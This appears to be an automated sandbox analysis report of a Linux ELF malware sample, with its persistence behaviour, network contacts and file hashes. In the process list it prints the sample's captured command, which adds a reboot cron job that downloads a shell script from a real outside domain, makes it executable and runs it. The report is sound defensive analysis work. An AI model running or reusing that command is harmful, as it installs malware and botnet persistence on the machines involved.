Analysis Overview
SHA256
d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125
Threat Level: Shows suspicious behavior
The file d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125.elf was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Creates/modifies Cron job
Modifies systemd
Changes its process name
Command and Scripting Interpreter: Unix Shell
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 02:55
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 02:55
Reported
2024-10-27 02:58
Platform
debian12-armhf-20240221-en
Max time kernel
136s
Max time network
175s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 194.36.144.87 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.tEfHeO | /usr/bin/crontab | N/A |
Modifies systemd
| Description | Indicator | Process | Target |
| File opened for modification | /lib/systemd/system/bot.service | /tmp/d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125.elf | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | /bin/sh /etc/init.d/rcS | /tmp/d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125.elf | N/A |
Command and Scripting Interpreter: Unix Shell
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/systemctl | N/A |
| File opened for reading | /proc/mounts | /tmp/d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125.elf | N/A |
Processes
/tmp/d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125.elf
[/tmp/d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125.elf]
/bin/sh
[/bin/sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/sh
[/bin/sh -c /bin/systemctl enable bot]
/bin/systemctl
[/bin/systemctl enable bot]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-6 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-6 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-6 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-6 | udp |
| DE | 194.36.144.87:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:13904 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.tEfHeO
| MD5 | 0919d9b4cb8a0fbe406d94ca48080b1c |
| SHA1 | bfda5c0093cabd9b3fae9f38549e872ffbf1851a |
| SHA256 | 9846262d801c240c9e95e57945caeab9e2353b9d8f70b0a3726373406fa40fd5 |
| SHA512 | 349b045def88bebe1fae4ae8e6c2a9f5f57b4fb874ff7dd0a6e1c2b2e808c4ebfca819a5b4f7217aa97200cc5908bc158020d385f9f30edd9540803791a49ad9 |
/usr/lib/systemd/system/bot.service
| MD5 | a4e30f6ce6fb6cf00e133f3c93fb5449 |
| SHA1 | 67b7de93a672ada4abfe11e339dc2e270c61b69d |
| SHA256 | a911f4bb5c69ad831fd6dc9004e52e656a846b2d7cbf152ab80c9b3928062ede |
| SHA512 | 893cda7cdcb75aceef89c64a38004feff8e5867e7bc76c622a49adfbff3fbb2c7916de6165ed4c43b4c7dabb5b56271e5a1b8a08d02b84389da92ec177289c25 |